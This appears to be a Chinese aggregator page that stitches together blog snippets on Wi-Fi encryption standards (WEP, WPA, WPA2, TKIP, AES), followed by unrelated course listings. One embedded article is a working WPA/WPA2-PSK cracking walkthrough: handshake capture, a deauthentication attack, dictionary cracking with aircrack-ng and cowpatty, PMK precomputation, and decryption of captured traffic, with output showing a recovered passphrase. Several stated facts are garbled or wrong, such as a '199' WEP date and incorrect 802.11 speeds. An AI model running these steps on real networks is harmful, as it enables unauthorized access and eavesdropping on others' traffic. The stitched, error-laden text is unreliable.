那么现在常用的无线加密方式都是什么呢?一般分为三种:WEP加密、WPA加密和WPA2加密。 目前WPA2是被业界认为最安全的加密方式,建议使用。而不建议选用WEP加密,因为它较其他加密方式最老,也是最不安全的加密方式。WPA加密是WEP加密的改进版,包含两种方式:预共享密钥和Radius密钥。其中预共享密钥(pre-share key缩写为PSK)有两种密码方式:TKIP和AES,相比TKIP,AES具有更好的安全系数,建议用户使用。 而WPA2加密,是WPA加密的升级版。WPA2同样也分为TKIP和AES两种方式,因此也建议选AES加密不要选TKIP。
-
WPA/WPA2加密分析
2020-01-04 21:15:36文章目录综述WPA加密方式分析密码字典攻击破解WPA-PSKwiresharkcowpatty加快WPA/WPA2 PSK加快速度解密WPA数据包 综述 WPA主要采用的是 临时密钥完整性协议(TKIP1) 加密...WPA和WPA2支持两种身份验证机制: 基于EAP...综述
WPA
主要采用的是 临时密钥完整性协议(TKIP1) 加密算法,TKIP 旨在改进WEP,且无需依赖全新硬件来运行;WPA2
则强制使用AES-CCMP算法来进行加密,比TKIP更强大、更坚固。WPA
和WPA2
支持两种身份验证机制:- 基于EAP的身份验证(采用RADIUS服务器)—> 企业
- 基于预共享密钥(Pre-Shared Key,PSK)的身份验证—> 个人
WPA加密方式分析
WPA/WPA2 PSK
极易为字典密码攻击–此种攻击需要的输入:
无线客户端与AP之间的4次WPA握手信息,以及常用密码攻击字典,之后利用aircrack-ng
之类的工具。WPA/WPA2 PSK 运作方式–>利用 PSK+5个参数来生成成对的临时密钥(PTK:Pairwise Transient Key),然后利用该密钥进行加密无线AP与申请者之间的通话信道。
- 网络的SSID
- 无线AP随机数 A-Nonce(Authenticator Nonce)
- 申请者随机数 S-Nonce(Supplicant Nonce)
- 无线AP MAC 地址
- 申请者MAC地址
通过wifi信道嗅探可以窃取整个会话过程中的所有5个参数,唯一不可获取的的仅为PSK
PSK生成:由用户提供的WPA-PSK密码外加SSID创建而成
WPA-PSK密码外加SSID都通过基于密码的密钥派生函数(Password-Based Key Derivation Function,PBKDF2)发送,该函数会输出一个256位的共享密钥2 。密码字典攻击
攻击者利用攻击工具外加大型的密码字典进行攻击。攻击工具会根据每个密码派生出一个256位的PSK,并用其与之前提及的其他参数来创建PTK。PTK将用来验证是否与某个握手数据包中的 消息完整性检查(Message Integrity Check, MIC)匹配。若匹配,则根据密码字典猜测的密码是正确的;若不匹配,则猜测的密码是错误的。
破解WPA-PSK
同样适用于WPA2网络
airodump wlan0mon airodump --bsssid ap_mac -c chanel -w ~/capture/ssid wlan0mon # deauth数据包,若命令的输出中存在与信道相关的错误信息 --ignore-negative-one aireplay-ng -0 10 -a ap_mac -c computer_mac wlan0mon --ignore-negative-one aircrack-ng ~/capture/ssid*.cap -w /usr/share/wordlists/rock.txt cowpatty -f /usr/share/wordlists/rockphone.txt -r capture/fast_966e-01.cap -s FAST_966E
wireshark
wireshark中打开airodump-ng工具中捕获的数据包.cap,用过滤表达式筛选并查看与WPA 4次握手相关的数据包。
WPA握手数据包所属的协议是EAPOL
kali自带的密码字典
cowpatty
cowpatty 4.8 - WPA-PSK dictionary attack. <jwright@hasborg.com> cowpatty: Must supply a pcap file with -r Usage: cowpatty [options] -f Dictionary file -d Hash file (genpmk) -r Packet capture file -s Network SSID (enclose in quotes if SSID includes spaces) -c Check for valid 4-way frames, does not crack -h Print this help information and exit -v Print verbose information (more -v for more verbosity) -V Print program version and exit root@yue:~# cowpatty -f /usr/share/wordlists/rockphone.txt -r capture/fast_966e-01.cap -s FAST_966E cowpatty 4.8 - WPA-PSK dictionary attack. <jwright@hasborg.com> Collected all necessary data to mount crack against WPA2/PSK passphrase. Starting dictionary attack. Please be patient. The PSK is "186****1111". 1 passphrases tested in 0.01 seconds: 143.37 passphrases/second
加快WPA/WPA2 PSK
使用PSK密码及SSID,通过PBKDF2计算PSK,不但极为消耗CPU资源,而且还耗时。在输出256位PSK之前,该函数会将两者排列组合超过4096ci。下一步的破解涉及使用该密码以及四次握手中参数,并与握手中MIC进行比对验证。参数会随每次握手而异。
关键: 尽快根据密码计算PSK通过预先计算PSK(也叫成对主密钥Pairwise Master Key:PMK)来加快破解进度
加快速度
- 使用genpmk工具,针对特定的SSID和wordlist预先计算PMK。
root@yue:~/Pictures# genpmk genpmk 1.3 - WPA-PSK precomputation attack. <jwright@hasborg.com> genpmk: Must specify a dictionary file with -f Usage: genpmk [options] -f Dictionary file -d Output hash file -s Network SSID -h Print this help information and exit -v Print verbose information (more -v for more verbosity) -V Print program version and exit After precomputing the hash file, run cowpatty with the -d argument. # genpmk -f password.lst.txt -d output_pmk.lst -s ap_ssid
生成output_pmk.lst文件
2. 利用cowpatty进行破解# cowpatty -d out_pmk.lst -s ap_ssid -r ~/capture/ap_ssid*.cap
解密WPA数据包
root@yue:~/Pictures# airdecap-ng --help Airdecap-ng 1.5.2 - (C) 2006-2018 Thomas d'Otreppe https://www.aircrack-ng.org usage: airdecap-ng [options] <pcap file> Common options: -l : don't remove the 802.11 header -b <bssid> : access point MAC address filter -e <essid> : target network SSID -o <fname> : output file for decrypted packets (default <src>-dec) WEP specific option: -w <key> : target network WEP key in hex -c <fname> : output file for corrupted WEP packets (default <src>-bad) WPA specific options: -p <pass> : target network WPA passphrase -k <pmk> : WPA Pairwise Master Key in hex --help : Displays this usage screen root@yue:~/Pictures# airdecap-ng -p 186****1111 -e FAST_966E ~/capture/fast_966e-01.cap Total number of stations seen 4 Total number of packets read 11843 Total number of WEP data packets 0 Total number of WPA data packets 906 Number of plaintext data packets 0 Number of decrypted WEP packets 0 Number of corrupted WEP packets 0 Number of decrypted WPA packets 376 Number of bad TKIP (WPA) packets 0
解密后生成的文件为:
-rw-r--r-- 1 root root 25250 Jan 4 20:44 fast_966e-01-dec.cap
-
无线网络的加密方式:WEP、WPA和WPA2
2018-10-23 22:16:30Wi-Fi 访问保护 II( WPA2 ) WPA-PSK/WPA2-PSK 无线网标准 有线等效加密( WEP ) 有线等效保密( WEP )是世界上使用最广泛的 Wi-Fi 安全算法。因为历史的缘故,以及向后兼容的原因,很多路由器的控制面板中...目录
有线等效加密( WEP )
有线等效保密( WEP )是世界上使用最广泛的 Wi-Fi 安全算法。因为历史的缘故,以及向后兼容的原因,很多路由器的控制面板中,用户会发现该算法位于加密类型选择菜单的首位。
WEP 于199年9月被批准作为 Wi-Fi 安全标准。即使在当时那个年代,第一版 WEP 的加密强度也不算高,因为美国对各类密码技术的限制,导致制造商仅采用了64位加密。当该限制解除时,加密强度提升至128位。尽管后来还引入了256位 WEP 加密,但128位加密仍然是最常见的加密。
尽管经过了修订算法,加长密钥等升级,但是随着时间的推移,人们发现了 WEP 标准的许多漏洞,随着计算能力的提高,利用难度也越来越低。早在2001年,就已经有相关漏洞的 POC 验证测试,2005年美国联邦调查局发布了公开演示(以增强人们对 WEP 标准缺陷的认识),他们使用公开的免费软件在几分钟内就破解了 WEP 的密码。
尽管还进行了种种改进、变通,或支撑 WEP 系统的尝试,但它仍然非常脆弱,依赖 WEP 的系统应该进行升级,如果不能进行安全升级,就更换新产品吧。 Wi-Fi 协会于2004年宣布 WEP 正式退役。
Wi-Fi 访问保护( WPA )
因为 WEP 加密标准频出漏洞, Wi-Fi 协会推出了 WPA 加密标准。该标准于2003年正式启用,正是 WEP 正式退役的前一年。 WPA 设置最普遍的是 WPA-PSK(预共享密钥),而且 WPA 使用了256位密钥,明显强于 WEP 标准中使用的64位和128位密钥。
WPA 标准作出了一些重大变革,其中包括消息完整性检查(确定接入点和客户端之间传输的数据包是否被攻击者捕获或改变)、临时密钥完整性协议(TKIP)。 TKIP 采用的包密钥系统,比 WEP 采用的固定密钥系统更加安全。 TKIP 协议最后被高级加密标准(AES)所取代。
尽管 WPA 较之于 WEP 是有了很大的改善, WPA 标准仍然不够安全。 TKIP 是 WPA 的核心组件,设计初衷是全为对现有 WEP 设备进行固件升级。因此, WPA 必须重复利用 WEP 系统中的某些元素,最终也被黑客利用。
与 WEP 遭遇相同,通过 POC 验证和公开演示也被证明易受攻击。有趣的是,对 WPA 的攻击过程中,通常不是直接对 WPA 算法进行攻击(虽然此类攻击已经成功),而是对 WPA 推出的一个补充系统 —— Wi-Fi保护设置(WPS)进行攻击,该设计的目的是为了方便建立连接。
Wi-Fi 访问保护 II( WPA2 )
WPA 标准于2006年正式被 WPA2 取代。 WPA 和 WPA2 之间最显着的变化之一是强制使用 AES 算法和引入 CCMP (计数器模式密码块链消息完整码协议)替代 TKIP 。
目前, WPA2 系统的主要安全漏洞很不起眼(漏洞利用者必须进行中间人模式攻击,从网络内部获得授权,然后延续攻击网络上的其它设备)。因此, WPA2 的已知漏洞几乎都限制在企业级网络。所以,讨论 WPA2 在家庭网络上是否安全没有实际意义。
不幸的是, WPA2 也有着 WPA 同样的致使弱点, Wi-Fi 保护设置( WPS )的攻击向量。尽管攻击WPA/WPA2保护的网络,需要使用现代计算机花费2至14小时持续攻击,但是我们必须关注这一安全问题,用户应当禁用 WPS (如果可能,应该更新固件,使设备不再支持 WPS ,由此完全消除攻击向量)。
WPA2加密方式是目前使用最广泛的无线加密方式。
WPA-PSK/WPA2-PSK
WPA和WPA2衍生出来的两种加密方式WPA-PSK和WPA2-PSK,他们之间的区别在于使用的加密算法。WPA-PSK和WPA2-PSK既可以使用TKIP加密算法也可以使用AES加密算法。
加密强度:WPA2-PSK AES算法 > WPA-PSK AES算法 > WPA2-PSK TKIP算法 > WPA-PSK TKIP算法 > WEP
无线网标准
IEEE802.11标准
- IEEE802.11a,速率最高可达54Mbps
- IEEE802.11b,速率最高可达11Mbps
- IEEE802.11g,速率最高可达54Mbps
- IEEE802.11n,速率最高可达108Mbps
- IEEE802.11ac,速率最高可达600Mbps
这里需要格外说明的是,不同的无线加密办法对无线网络传输速率的影响也不尽相同。因为IEEE 802.11n规范不支持以WEP加密或TKIP加密算法的高吞吐率,所以假如用户挑选了WEP加密办法或WPA-PSK/WPA2-PSK加密方法的TKIP算法,无线传输速率将会主动限制在IEEE 802.11g的水平。
也就是说,假如用户运用的是契合IEEE 802.11n规范的无线商品,那么无线加密办法只能挑选WPA-PSK/WPA2-PSK的AES算法加密,不然无线传输速率将会显着下降。而假如用户运用的是契合IEEE 802.11g规范的无线商品,那么几种加密办法都能够极好的兼容,不过我们仍然不主张挑选WEP这种较老且现已被破解的加密办法,最好能够晋级一下无线路由,挑选目前最新的无线加密方法
-
那么现在常用的无线加密方式都是什么呢?一般分为三种:WEP加密、WPA加密和WPA2加密。...
2014-02-09 15:57:00一般分为三种:WEP加密、WPA加密和WPA2加密。 目前WPA2是被业界认为最安全的加密方式,建议使用。而不建议选用WEP加密,因为它较其他加密方式最老,也是最不安全的加密方式。WPA加密是WEP加密的改进版,包含两种方式...转载于:https://www.cnblogs.com/chixiaojin/p/3541510.html
-
wifi加密方式WPA与WPA2的区别
2020-03-29 23:47:57(1)WEP、WAP、WPA2加密: WEP 是1999年9月通过的 IEEE 802.11 标准的一部分,使用 RC4(Rivest Cipher) 串流加密技术达到机密性,并使用 CRC-32 校验和...WPA全名为Wi-Fi Protected Access,有WPA和WPA2两个标准...(1)WEP、WAP、WPA2加密:
WEP 是1999年9月通过的 IEEE 802.11 标准的一部分,使用 RC4(Rivest Cipher) 串流加密技术达到机密性,并使用 CRC-32 校验和达到资料正确性。在 2001年8月,RC4加密方式被破解,WEP加密不再安全,于2003年被WPA加密所淘汰。WPA全名为Wi-Fi Protected Access,有WPA和WPA2两个标准,是一种保护无线网络(Wi-Fi)安全的系统,它是应研究者为弥补前一代加密(WEP)的几个严重的弱点而产生的。WPA是在802.11i完备之前替代WEP的过渡方案。 WPA/WPA2有两种版本,企业版(WPA/WPA2)和个人版(WPA-PSK/WPA2-PSK)。家庭用户一般用个人版的加密方式就足够了。个人版的使用两种算法TKIP和AES,TKIP(临时密钥完整性协议)是一种旧的加密标准,本质上是一个WEP补丁。AES(高级加密标准)是一个完全独立的加密算法,远远优于任何TKIP提供的算法,安全性比 TKIP强,使用该算法的无线网络传输速率也要比TKIP更快。 WEP加密仅支持802.11、802.11b、802.11g协议,故使用WEP加密时数据传输速率最大不超过54Mbit/s。WPA/WPA2的TKIP算法同样仅支持802.11、802.11b、802.11g,向下兼容WEP,使用该算法时数据传输速率不高于 54Mbit/s。WPA/WPA2的AES算法适用于802.11n无线传输协议,当使用40MHz带宽和4*MIMO时,速度最高可达600Mbit/s。 WPA-PSK向下兼容WEP,支持TKIP算法,WPA2-PSK不兼容WEP,仅支持TKIP和AES(CCMP)算法。使用WEP或TKIP加密算法时,无线协议会自动切换到b/g低速率模式,一般情况下建议使用混合加密方式。
-
WPA/WPA2安全认证加密原理详解
2020-06-27 22:25:18802.11i(WPA2) = 802.1x + EAP + AES + CCMP = Pre-shared Key + AES + CCMP l802.1x + EAP,Pre-shared Key是身份校验算法(WEP没有设置有身份验证机制) lTKIP和AES是数据传输加密算法(类似于WEP加密的R... -
WPA加密
2007-10-04 08:08:00WPA加密即:Wi-Fi Protected Access,其加密特性决定了它比WEP更难以入侵,所以... WPA是目前最好的无线安全加密系统,它包含两种方式:Pre-shared密钥和Radius密钥: 1)、Pre-shared密钥有两种密码方式:TKIP和AES,... -
WEP/WPA/WPA2加密标准有什么区别?
2018-04-06 18:33:29WEP/WPA/WPA2加密标准有什么区别? 大多数的公共场合 WiFi 是不加密的,但居住区却是常见一些使用 WAP 和 WAP2 加密标准的 Wi-Fi 信号。可能很多用户在设置路由器加密标准的时候都比较费解,WEP、WPA 和 WPA2 等... -
android wifi热点自动连接类包含加密方式WPA2_PSK 和WPA_PSK,已测试
2017-01-21 16:48:14自动连接创建的wifi热点类,包含加密方式WPA2_PSK和WPA_PSK ,同时解决部分android手机自动连接热点导致被切换的问题,在我的前一个demo,android 解决部分手机连接热点wifi导致被切换(链接:...添加了包含了WPA2_PSK... -
四代Wi_Fi加密技术简析(WEP,WPA,WPA2,WPA3).pdf
2020-09-11 15:31:40WPA全名为Wi-Fi Protected Access,有WPA和WPA2两个标准,是一种保护无线电脑网络(Wi-Fi)安全的系统,它是应研究者在前一代的系统有线等效加密(WEP)中找到的几个严重的弱点而产生的。WPA实作了IEEE 802.11i标准... -
【2】Kali破解家用WI-FI密码 - WPA/WPA2加密
2020-03-13 16:52:39【学习记录】 本人小白一枚,文章用来记录自己目前的学习进度,希望能够用最通俗易懂的语言和命令来为大家讲清楚我的实验过程和经验...使用Kali系统中已有的Aircrack-ng套件,破解附近使用WPA/WPA2加密的家用WI-FI密... -
WPA和WPA2关系
2014-11-07 17:31:27WPA和WPA2关系 分类: WLAN 2009-04-22 11:00 649人阅读 评论(0) 收藏 举报 express加密算法streamaccesswindows WPA 全名為 Wi-Fi Protected Access,有WPA 和 WPA2兩個標準,是一種保護無線電腦... -
无线加密WEP、WPA、WPA2及TKIP、AES
2019-04-16 17:38:00加密方式选用混合模式:WPA_PSK/WPA_PSK2 (个人版选用这个) 加密算法也使用混合模式:TKIP/AES 2.4G频段尽量使用b/g/n混合标准协议,频宽40MHz,5G使用ac/n/a混合,频宽80MHz。 前言:802.11b和11g是低速模式... -
WPA和WPA2的区别
2018-01-25 20:29:08【WPA和WPA2的区别】 WPA: 1. 连接WPA型的热点时需要VendorParamSet参数。 2. 连接WPA型的热点后需要经过PTK四次握手和GTK两次握手, PTK是在四次握手的第三次握手完成时安装的, 不安装PTK将无法进行GTK两次握手。GTK... -
解密WEP和WPA-PSK/WPA-PSK加密的数据包
2016-03-01 15:02:30WPA-PSK/WPA2-PSK安全类型其实是WPA/WPA2的一种简化版别,它是依据同享密钥的WPA形式,安全性很高,设置也对比简单,合适普通家庭用户和小型企业运用。这里我们还是来看看如何在wireshark里设置解密。 关于wep基本... -
WPA2-PSK中的TKIP加密协议加密流程
2021-02-03 15:44:37上一篇文章主要介绍了关于WPA2-PSK加密方式的密钥生成和交换过程,本文,介绍一下WPA2-PSK加密方式使用的其中一种算法TKIP加密协议对数据的加密流程。如果细究算法本身,可能需要一些密码学的知识,我们只是简单介绍... -
使用 Aircrack-ng 破解 WEP 和 WPA/WPA2 加密的 Wi-Fi 密码。
2016-11-21 22:48:234.破解 WPA/WPA2 加密的 Wi-Fi 流程 前面的过程和 3.1,3.2,3.3 一样。使 wlan0mon 处于监视模式下 4.1 airodump-ng --bssid BSSID -c CH -w 文件位置 wlan0mon #-w 是抓的包输出目录,注意加-c,不然... -
WEP,WPA-PSK,WPA2-PSK握手深入分析2--TKIP加密和解密
2014-09-11 14:08:11TKIP加密过程 -
WPA/WPA2, WPA-PSK/WPA2-PSK, WEP 三种安全机制的概念和区别
2018-11-02 14:33:56现在基本家家户户都安装有无线WIFI,而且可能不止一个,不过为了安全,大家都会...下面装机之家小编来为大家讲讲这三种加密方式 WPA-PSK/WPA2-PSK、WPA/WPA2、WEP有什么区别,以及如何选择AES和TKIP加密算法。 ... -
WPA 和 WPA2 以及WPA-PSK / WPA2-PSK的区别
2015-07-03 21:02:45WPA2 = IEEE 802.11i = IEEE 802.1X/EAP + WEP( 选择性项目 )/TKIP/CCMP ( 有些无线网路设备中会以 AES 、 AES-CCMP 的字眼来取代 ),简单说,两者的加密机制是相同的,只是加密算法不同,前者用TK -
CentOS 命令行下连接加密模式为 WPA/WPA2-PSK 的无线网络
2014-06-13 03:20:14后来当把路由器的加密模式设置为 WPA/WPA2-PSK的时候,发现已经无法连接无线网络了,原因是当使用 WPA/WPA2-PSK 加密模式之后客户端不能直接发送明文密码,而是要使用加密之后的密码,既然我们知道了原因我们该怎么... -
使用 Aircrack-ng 破解 WEP 和 WPA/WPA2 加密的 Wi-Fi 密码。(转)
2016-08-12 00:27:001.首先请不要使用此方法去搞破坏,去蹭Wi-Fi,因为不装逼地说,我认为技术本身的价值很大,尤其是在学习这个技术的过程...2.欢迎使用Kali Linux 的朋友互相交流,大家共同进步学习。 索引: 1.工具 2.需要了解的... -
WEP、WPA和WPA2的区别
2012-12-06 11:02:27WEP、WPA和WPA2的区别 = WEP = 有线等效加密(Wired Equivalent Privacy),又称... -
WEP,WPA-PSK,WPA2-PSK握手深入分析2--CCMP(AES)加密和解密
2014-09-11 14:31:46CCMP加密流程: -
Linux开发板连接WPA加密的AP路由器
2021-01-27 14:38:16wpa_supplicant有部分驱动支持不完善,但支持WEP、WPA、WPA2加密。 由于WEP在现在市面的路由器中已经几乎被淘汰,因此使用wpa_supplicant进行连接。wpa_supplicant初次配置较为复杂,但配置一次后,下次遇到该AP时就... -
WPA2 和 WPA 的区别
2015-04-16 21:48:04WPA2和WPA最大的不同就是WPA2为了更加安全,支持AES加密 目前对与这个方案并没有什么非常好的解决办法 一般来讲就是跑字典,由于穷举的时间几乎为不可能 不过在了解的过程中,似乎有一种破解PIN码的方法颇为有效... -
Elcomsoft宣称WPA/WPA2无线加密破解速度提高100倍
2008-10-15 09:47:00俄罗斯安全公司Elcomsoft发布了一款暴力破解软件——Elcomsoft Distributed Password Recovery的最新版,能够利用Nvidia显卡使WPA和WPA2无线密钥破解速度提高100倍,而且软件还允许数千台计算机联网进行分布式并行... -
利用kali破WPA2加密的wifi
2018-10-04 16:17:002.如果是虚拟机还需要一个kali能识别的无线网卡(常见的有芯片为3070和8187) 3.强大的字典(kali中也有自带的,不过还是自己收集的好用一些) 解压kali中的自带的rockyou.txt.gz: gzip -d /usr...
-
Galera 高可用 MySQL 集群(PXC v5.7+Hapro)
-
Windows系统管理
-
四翼混沌吸引子的拓扑马蹄分析及电路实现
-
CBOEX交易所—牛年开跑,开启数字交易新局面!
-
MySQL Router 实现高可用、负载均衡、读写分离
-
【硬核】一线Python程序员实战经验分享(1)
-
JVM——Java虚拟机架构
-
朱老师鸿蒙系列课程第1期-3.鸿蒙系统Harmonyos源码配置和管理
-
基于Flink+Hudi构建企业亿级云上实时数据湖教程(PC、移动、小
-
itext所需的包.zip
-
光纤空气隙法布里-珀罗标准具透射谱线型研究
-
babel/polyfill
-
vue3从0到1-超详细
-
使用HttpClient实现服务器间的文件上传下载方法
-
自动化测试Python3+Selenium3+Unittest
-
MySQL 四类管理日志(详解及高阶配置)
-
MySQL 多实例安装 及配置主从复制实验环境
-
NFS 网络文件系统
-
MySQL 主从复制 Replication 详解(Linux 和 W
-
ppp扑克脸-源码